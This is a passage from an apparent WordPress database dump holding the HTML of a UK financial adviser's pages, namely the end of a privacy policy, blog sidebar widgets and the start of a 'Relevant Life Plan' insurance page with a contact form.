so. We may use your personal information to send you promotional information about third parties which we think you may find interesting if you tell us that you wish this to happen.You may request details of personal information which we hold about you under the Data Protection Act 1998. A small fee will be payable. If you would like a copy of the information held on you please <b>contact us.</b>If you believe that any information we are holding on you is incorrect or incomplete, please write to or email us as soon as possible, at the above address. We will promptly correct any information found to be incorrect.</p>&#13;\n							</div>&#13;\n											</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\"><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">&#13;\n										<img width=\"52\" height=\"34\" src=\"../wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n									<div class=\"meta\">&#13;\n										February 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n									<div class=\"meta\">&#13;\n										February 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n									<div class=\"meta\">&#13;\n										January 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 31st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (2)</option><option class=\"level-0\" value=\"4\">Pensions  (4)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (8)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul></div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Privacy Policy','Privacy Policy set out for www.equalitywalk.org.uk by Equity SMART.','publish','closed','closed','','privacy-policy','','','2017-09-21 16:34:37','2017-09-21 16:34:37','',0,'http://www.equalitywalk.org.uk/privacy-policy',0,'page','',0),(98,1,'2017-09-21 16:34:38','2017-09-21 16:34:38','<body class=\"page page-id-2872 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-2872 current_page_item menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Relevant Life Plan										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Relevant Life Plan</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-2872\" class=\"post-2872 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Relevant Life Plan</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/\" title=\"Posts by Paul Bassi\" rel=\"author\">Sam Bassi</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:#f3fbeb;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><div class=\"one_half\">&#13;\n<h1><b>Isn’t it Time the Taxman Gave You Something Back?</b></h1>&#13;\n<p>Relevant Life plans are the next generation of insurance that can save you up to 60% on the cost, if you’re a company director or key individual. It’s simply the most tax efficent way to provide financial security for your family.</p>&#13;\n<p><a href=\"#\"/>no benefit-in-kind charge back to the company<br/>&#13;\nno national insurance implications<br/>&#13;\ntax-free benefits to your dependants</p>&#13;\n<p style=\"text-align: center;\">Get started by watching our short video &gt;&gt;&gt;<br/></p>&#13;\n</div>&#13;\n<div class=\"one_half last\"><div class=\"demo-sep sep-none\" style=\"margin-top:40px;\"/><iframe src=\"http://www.youtube.com/embed/YPZsCxkz6XI?rel=0\" height=\"275\" width=\"367\" allowfullscreen=\"\" frameborder=\"0\"/></div><div class=\"clearboth\"/></div></div>&#13;\n<div class=\"fullwidth-box\" style=\"background-color:#fff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<div class=\"one_half\">&#13;\n<div class=\"title\"><p>We’re here when you need us, keeping things secure and ON TRACK for you, your family and your future. Don’t Leave It To Chance! Here’s how our advice puts you in the driving seat:</p><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<p>Independent – We give you an unbiased assessment of all insurance plans through best practice to ensure you are not mis-sold a financial product.</p>&#13;\n<p>You Save Money – Reduce your premiums through our advice-based discounts so you achieve the best cover at the most economical cost.</p>&#13;\n<p>Medical Disclosures – Pre or existing medical conditions can affect your premiums &amp; covere, we ensure nothing’s missed that could leave your family penniless.</p>&#13;\n<p>Reduced Admin &amp; Time Hassles – By getting it right first time we ensure that the hard work is done by us, not you. You’ll feel safe in the knowledge that your insurance needs are all being expertly handled.</p>&#13;\n<h2>You simply cannot get this level of service and expertise via a price comparison site.<b/></h2>&#13;\n<p/></div><div class=\"one_half last\">&#13;\n<div class=\"title\"><p>Fill in our form to start your Free Insurance Review</p><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><span style=\"color: #000000;\">Expert Impartial Advice &amp; A </span><span style=\"color: #000000;\">Free Consultation With No Obligation</span>&#13;\n<div class=\"wpcf7\" id=\"wpcf7-f4410-p2872-o1\"><form action=\"../relevant-life-plan/\" method=\"post\" class=\"wpcf7-form\" novalidate=\"novalidate\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"4410\"/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.7\"/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\"/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f4410-p2872-o1\"/><input type=\"hidden\" name=\"_wpnonce\" value=\"18df905ccd\"/></div>&#13;\n<p>Your Name *<br/><span class=\"wpcf7-form-control-wrap your-name\"><input type=\"text\" name=\"your-name\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p>Your Tel No.*<br/><span class=\"wpcf7-form-control-wrap text-533\"><input type=\"text\" name=\"text-533\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p>Your Email *<br/><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p>What would you like to speak to us about?<br/><span class=\"wpcf7-form-control-wrap menu-478\"><select name=\"menu-478\" class=\"wpcf7-form-control wpcf7-select\" aria-invalid=\"false\"><option value=\"Relevant Life Insurance\">Relevant Life Insurance</option><option value=\"Keyman Insurance\">Keyman Insurance</option><option value=\"Shareholder Protection\">Shareholder Protection</option><option value=\"Critical Illness Cover\">Critical Illness Cover</option><option value=\"Other\">Other</option></select></span></p>&#13;\n<p>Enter The Characters Shown In The Image:<br/><input type=\"hidden\" name=\"_wpcf7_captcha_challenge_captcha-691\" value=\"1223937137\"/><span class=\"wpcf7-form-control-wrap captcha-691\"><input type=\"text\" name=\"captcha-691\" value=\"\" size=\"15\" class=\"wpcf7-form-control wpcf7-captchar\" aria-invalid=\"false\"/></span></p>&#13;\n<p><input type=\"submit\" value=\"Get in Touch\" class=\"wpcf7-form-control wpcf7-submit\"/></p>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"/></form></div>&#13;\n<p/></div><div class=\"clearboth\"/></div></div>&#13;\n<div class=\"fullwidth-box\" style=\"background-color:#fff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:0px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: x-large;\">We compare <span style=\"color: 